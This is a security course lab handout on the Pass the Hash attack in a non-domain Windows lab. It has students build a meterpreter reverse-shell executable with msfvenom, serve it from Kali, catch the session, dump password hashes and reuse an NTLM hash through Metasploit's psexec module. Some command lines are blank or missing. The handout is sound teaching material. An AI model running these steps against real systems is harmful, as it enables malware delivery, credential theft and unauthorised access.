Proj 14x: Pass The Hash (10 pts. extra credit)

What You Need for this Project


To practice the Pass the Hash attack in a non-domain environment.

Task 1: Getting Hashes

Exploiting the Target with a Malicious Download

First we'll get the password hashes from the target, using malware. Launch your Kali machine.

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4445 -f exe > /var/www/html/mal.exe
service apache2 start
In Kali, execute these commands to start a C&C listener.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4445
On your Windows target, in Firefox, go to this URL, replacing the IP address with the IP address of your Kali machine:
Download mal.exe and run it.

On your Kali machine, a meterpeter session opens, as shown below.

Execute these commands to start interacting with the Meterpreter shell and dump the hashes:

sessions -i 1

Notice the highlighted text in the image above. This is the Administrator password hash, which we will use later.

Execute this command to close the Meterpreter session.


Task 2: Passing the Hash

Suppose you are attacking a company and you trick one user into running malware, so you get some hashes from that machine.

The hashes might work on other machines at the same company. In our case we'll attack the same target, but in a real pentest you'd be attacking a different machine.

Using Metasploit's Psexec Module

On Kali, in Metasploit, Execute these commands:
use windows/smb/psexec
show options
As shown below, there are options for a username and password.

The amazing thing about the pass-the-hash attack is that the password hashes work fine without cracking them.

In Metasploit, execute these commands, replacing the IP address with the IP address of your target system:

set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
A Meterpreter session opens, as shown below.

Saving the Screen Image

Make sure you can see these two required items, as shown above:

Save a FULL DESKTOP image with the filename Proj 14x from Your Name.

Turning in Your Project

Send the image as an email attachment to with a Subject line of Proj 14x from Your Name.


Pass-the-hash attacks: Tools and Mitigation (2010)

Posted 9-22-17 by Sam Bowne
Revised 9-25-17